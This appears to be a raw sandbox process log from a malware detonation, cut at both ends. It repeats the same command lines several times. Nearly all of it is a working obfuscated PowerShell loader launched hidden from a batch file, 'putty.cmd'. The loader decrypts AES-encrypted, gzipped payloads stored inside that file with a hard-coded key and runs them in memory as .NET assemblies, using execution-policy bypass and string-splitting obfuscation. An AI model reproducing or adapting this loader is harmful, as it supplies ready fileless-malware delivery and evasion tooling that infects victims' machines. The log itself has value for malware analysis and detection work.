System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 
6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function 